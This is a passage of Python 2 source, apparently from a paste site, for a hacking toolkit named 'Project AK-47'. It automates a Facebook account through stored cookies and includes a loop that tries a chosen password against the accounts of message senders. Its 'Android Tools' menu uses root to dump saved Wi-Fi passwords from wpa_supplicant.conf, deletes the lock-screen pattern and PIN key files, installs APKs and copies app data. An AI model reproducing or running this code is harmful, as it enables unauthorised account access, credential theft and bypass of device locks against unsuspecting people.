  1268.                     print G + '     [ Incomming Messages ]' + xin
  1269.                     while True:
  1270.                         try:
  1271.                             o = BeautifulSoup(s.get(url.format('/messages')).content, 'html.parser').find_all('h3')
  1272.                             if o[1].get_text() not in oldmes:
  1273.                                 print ('{} > {} [ {} ]').format(SBG, G, o[1].get_text())
  1274.                                 n = o[0].a['href'].split('A')[1].split('&')[0]
  1275.                                 oldmes.append(o[1].get_text())
  1276.                                 fsend(n, message)
  1277.                         except:
  1278.                             pass
  1279.  
  1280.                 if rchoc == '3' or rchoc == '03':
  1281.                     oldmes = []
  1282.                     pxa = raw_input(SGO + ' Password To Try On Messager Account : ')
  1283.                     funx(SBR + ' Loading Custom Reply BOT ')
  1284.                     os.system('clear')
  1285.                     print G + '     [ Password Try On Message Sender ]' + xin
  1286.                     while True:
  1287.                         try:
  1288.                             o = BeautifulSoup(s.get(url.format('/messages')).content, 'html.parser').find_all('h3')
  1289.                             if o[1].get_text() not in oldmes:
  1290.                                 n = o[0].a['href'].split('A')[1].split('&')[0]
  1291.                                 print ('{} > Trying on {}{}  {}[{}]').format(SBG, R, n, G, o[0].a.get_text())
  1292.                                 oldmes.append(o[1].get_text())
  1293.                                 checkms(n, pxa)
  1294.                         except:
  1295.                             pass
  1296.  
  1297.         elif optc == '8' or optc == '08':
  1298.             os.system('clear')
  1299.             print ('\n       {}[ ANDROID TOOLS ]\n\n     {}Make Sure Your Device is Rooted :)\n        {}${} Root@Android = :)\n\n     {} 1 : View Saved Wifi Password\n     {} 2 : Remove Pattern Lock\n     {} 3 : Remove Pin Lock\n     {} 4 : APK Install \n     {} 5 : Backup Apps\n     {} 6 : Go Back <=\n\n     ').format(G, Y, W, G, SBG, SBG, SBG, SBG, SBG, SBG)
  1300.             while 1:
  1301.                 rchoc = raw_input(SGO + ' CHOICE : ')
  1302.                 if rchoc == '6' or rchoc == 'back':
  1303.                     main(url, '1')
  1304.                 if rchoc == '1' or rchoc == '01':
  1305.                     funx(SBR + ' Getting Wifi Passwords')
  1306.                     os.system('clear')
  1307.                     try:
  1308.                         print G + '   [ WIFI-Passwords ] '
  1309.                         wpass = os.popen("su -c 'cat /data/misc/wifi/wpa_supplicant.conf'").read()
  1310.                         print G + wpass
  1311.                     except:
  1312.                         print SBR + ' Failed (Root Error)'
  1313.  
  1314.                     print xin + SR + ' Type back to go back'
  1315.                 if rchoc == '2' or rchoc == '02':
  1316.                     funx(SBR + ' Removing Lockscreen Pattern')
  1317.                     try:
  1318.                         os.system("su -c 'rm /data/system/gesture.key'")
  1319.                         print SBR + ' Pattern Removed Sucessfully'
  1320.                     except:
  1321.                         print SBR + ' Failed (Root Error)'
  1322.  
  1323.                 if rchoc == '3' or rchoc == '03':
  1324.                     funx(SBR + ' Removing Lockscreen PIN')
  1325.                     try:
  1326.                         os.system("su -c 'rm /data/system/password.key'")
  1327.                         print SBR + ' PIN Removed Sucessfully'
  1328.                     except:
  1329.                         print SBR + ' Failed (Root Error)'
  1330.  
  1331.                 if rchoc == '4' or rchoc == '04':
  1332.                     apkp = raw_input(SGO + ' PATH TO APK : ')
  1333.                     funx(SBR + ' Installing APK ')
  1334.                     try:
  1335.                         os.system(("su -c 'pm install {}'").format(apkp))
  1336.                         print SBR + ' App Installed Sucessfully'
  1337.                     except:
  1338.                         print SBR + ' Failed (Root Error)'
  1339.  
  1340.                 if rchoc == '5' or rchoc == '05':
  1341.                     apkp = raw_input(SGO + ' Where To Keep Backup (PATH)? : ')
  1342.                     funx(SBR + ' Getting Apps ')
  1343.                     try:
  1344.                         os.system(("su -c 'cp -r /data/app {}'").format(apkp))
  1345.                         print SBR + " App's Backup Sucessfull"
  1346.                     except:
  1347.                         print SBR + ' Failed (Root Error)'
  1348.  
  1349.         elif optc == '9' or optc == '09':
  1350.             os.system('clear')
  1351.             funx(SBR + ' Updating Project AK-47 ')
  1352.             try:
  1353.                 os.system('git pull')
  1354.                 print SBG + ' Project AK-47 Updated Sucessfully..!'
  1355.             except:
  1356.                 print SBR + ' Poject AK-47 Update Failed :('
  1357.  
  1358.         else:
  1359.             print SRO + R + ' Invalid Choice !'
  1360.             time.sleep(1)
  1361.             main(url, '1')
  1362.  
  1363.  
  1364.     if not os.path.exists('.cookie'):
  1365.         print SG + ' Login With Facebook Email/Password..'
  1366.         login(url)
  1367.     else:
  1368.         funx(SG + ' Loading Available Cookies Data')
  1369.         try:
  1370.             s.cookies.update(json.loads(open('.cookie', 'r').read()))
  1371.             print xin + SG + " Cookie's Data Loaded !"
  1372.             main(url, '0')
  1373.         except:
  1374.             pass
Add Comment
Please, Sign In to add comment